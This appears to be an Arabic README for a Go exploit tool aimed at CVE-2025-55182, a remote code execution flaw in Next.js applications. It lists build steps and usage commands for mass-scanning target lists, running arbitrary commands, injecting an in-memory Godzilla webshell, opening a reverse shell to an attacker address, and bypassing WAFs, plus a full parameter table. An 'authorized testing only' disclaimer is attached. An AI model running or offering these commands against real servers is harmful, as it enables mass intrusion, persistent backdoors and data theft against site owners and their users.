
أداة فحص واستغلال ثغرة CVE-2025-55182، تستهدف ثغرة تنفيذ الأكواد عن بُعد في تطبيقات Next.js. تدعم الفحص الجماعي، تنفيذ الأوامر، حقن حصان طروادة الذاكري Godzilla، ووظيفة الـ Reverse Shell.
⚠️ هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، يُرجى عدم استخدامها لأغراض غير قانونية.
.txt.success.json، مع إمكانية اختيارية لكتابة عناوين URL الثغرات إلى ملف محدد.[
]
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC
go build -o cve-2025-55182 main.go
./cve-2025-55182 -h
./cve-2025-55182 -u http://target.com:3000
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
./cve-2025-55182 -u http://target.com:3000 -c "whoami"
./cve-2025-55182 -u http://target.com:3000 -g
بعد الحقن الناجح، ستقوم الأداة بإخراج عنوان الاتصال وكلمة المرور والمفتاح ومعلومات ترويسة الطلب الخاصة بـ Godzilla.
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
success.json: يحفظ تلقائيًا التفاصيل الكاملة للأهداف التي تم استغلالها بنجاح (بما في ذلك مخرجات الأوامر وإعدادات Godzilla وما إلى ذلك).-o: يحفظ قائمة عناوين URL الثغرات (واحد في كل سطر).أثناء الفحص، يتم عرض شريط التقدم والثغرات المكتشفة في الوقت الفعلي، مع إخراج إحصائيات في النهاية.
-p لتعيين الوكيل.-to بشكل مناسب.هذه الأداة مخصصة للبحث الأمني والاختبار المصرح به فقط، ويتحمل المستخدم كامل المسؤولية القانونية. لا يتحمل المطور أي مسؤولية عن أي إساءة استخدام.
| المعامل | النوع | القيمة الافتراضية | الوصف |
|---|
-u | string | لا يوجد | عنوان URL واحد للهدف (مثل http://example.com:3000) |
-f | string | لا يوجد | ملف يحتوي على قائمة عناوين URL (واحد في كل سطر) |
-d | string | لا يوجد | مجلد يحتوي على عدة ملفات .txt |
-o | string | لا يوجد | ملف الإخراج (حفظ عناوين URL الثغرات، واحد في كل سطر) |
-t | int | 10 | عدد الخيوط المتزامنة |
-to | int | 10 | مهلة الطلب (بالثواني) |
-c | string | لا يوجد | الأمر المطلوب تنفيذه (مثل id) |
-m | string | لا يوجد | الوضع: waf (تفعيل تجاوز WAF) |
-p | string | لا يوجد | وكيل HTTP (مثل http://127.0.0.1:8080) |
-g | bool | false | تفعيل حقن حصان طروادة Godzilla الذاكري |
-rs | string | لا يوجد | عنوان الـ Reverse Shell (بالصيغة IP:PORT) |
-dv | bool | false | الوضع المفصّل (طباعة عملية الفحص لكل عنوان URL) |
-es | bool | false | وضع فحص المعلومات الحساسة |